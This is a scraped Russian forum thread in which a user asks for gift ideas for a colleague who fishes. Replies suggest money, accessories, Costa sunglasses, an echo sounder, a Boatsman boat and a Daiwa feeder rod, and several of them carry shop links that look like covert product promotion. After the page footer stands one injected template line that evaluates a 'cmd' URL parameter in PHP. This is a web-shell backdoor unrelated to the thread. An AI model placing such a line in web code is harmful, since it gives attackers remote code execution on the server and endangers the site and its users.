+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 12

Тема: Что подарить рыбаку?)


  1. #1

    Что подарить рыбаку?)

    У моего коллеги день рожденья и он внезапно пригласил меня к себе и еще нескольких людей отметить. Правда его я знаю не очень хорошо, разве что только то что он любит рыбалку, а вот я в ней ничего не понимаю. В общем решил что-то рыбацкое подарить и не такое что бы фуфло. Может подскажите идеи с подарком?

  2. #2
    Новичок Serf is on a distinguished road Аватар для Serf
    Регистрация
    05.04.2019
    Сообщений
    136
    Лучший подарок - это деньги, всегда так считал и думал, так как с подарком, особенно если человека плохо знаешь, трудно угадать. Мне сколько всякого не дарили, все фигня, так что я всегда за деньги)

  3. #3
    Хорошую удочку или спиннинг вы вряд ли сможете выбрать, тем более хорошая так вещь дешево стоить не будет. Лучше посмотрите на каком-то рыбацком сайте аксессуары, уверен, что-то подходящее которое может пригодиться любому рыбаку вы найдете)

  4. #4
    Новичок Devid is on a distinguished road Аватар для Devid
    Регистрация
    05.04.2019
    Сообщений
    132
    Есть такие очки бренда Costa - https://pike.ru/ochki-costa-del-mar/ , они предназначены для рыбалки или для тех кто любит водный спорт. В общем полистайте цены, модели таких очков, думаю подарок будет подходящий, точно не прогадаете. Правда я дешевыми их назвать не могу, но они и не слишком дорогие на мой взгляд.

  5. #5
    Мимо проходил Балтасар is on a distinguished road Аватар для Балтасар
    Регистрация
    16.06.2020
    Откуда
    .-.-
    Машина
    Фольц
    Сообщений
    17
    Я был бы рад если бы мне эхолот подарили. Недавно купил себе лодку и теперь мечтаю об эхолоте. Хочу снимать свои уловы.
    Последний раз редактировалось Балтасар; 24.07.2020 в 19:09.

  6. #6
    Мимо проходил Kommunar is on a distinguished road Аватар для Kommunar
    Регистрация
    26.01.2019
    Откуда
    .....
    Машина
    .....
    Сообщений
    66
    Подарок всегда должен быть полезным. Считаю, лучше не дарить ничего чем дарить какую-то ерунду. Мне недавно дети очень угодили с подарком на юбилей. Спросили у меня что бы я хотел, а я им показал лодки Вoatsman , на которые уже давно посматриваю https://lodki-spb.ru/category/lodki-boatsman/ Ну мы вместе и выбрали мне одну из лодок. Теперь иногда выезжаю из Питера за город на рыбалку. Удовольствие неописуемое!

  7. #7
    Мимо проходил fred34 is on a distinguished road Аватар для fred34
    Регистрация
    27.07.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    6
    Цитата Сообщение от Serf Посмотреть сообщение
    Лучший подарок - это деньги, всегда так считал и думал, так как с подарком, особенно если человека плохо знаешь, трудно угадать. Мне сколько всякого не дарили, все фигня, так что я всегда за деньги)
    Абсолютно верно!

  8. #8
    Мимо проходил Nina Karadova is on a distinguished road Аватар для Nina Karadova
    Регистрация
    29.07.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    33
    принадлежности рыбацкие

  9. #9
    Мимо проходил Ярый is on a distinguished road Аватар для Ярый
    Регистрация
    29.04.2020
    Машина
    Нисан
    Сообщений
    14
    Да что угодно, начиная с одежды заканчивая рыбацкими принадлежностями.

  10. #10
    Мимо проходил Гарри is on a distinguished road Аватар для Гарри
    Регистрация
    06.03.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    11
    Я бы обрадовался если бы мне подарили фидер Daiwa https://daiwa.in.ua/udilishcha/fidernie/ . Давно о таком мечтаю, но купить не могу так как жалко 3 тыс гривен потратить. Такие фидеры конечно очень отличаются от дешевых моделей своей функциональностью и прочностью.

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Похожие темы

  1. Ответов: 6
    Последнее сообщение: 03.04.2024, 03:15
  2. Ответов: 3
    Последнее сообщение: 13.01.2020, 01:59
  3. Стальную Защиту На Gti 5 Кому Подарить?
    от Filya в разделе Стайлинг: кузов, салон, свет и прочее
    Ответов: 0
    Последнее сообщение: 01.01.1970, 04:00

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}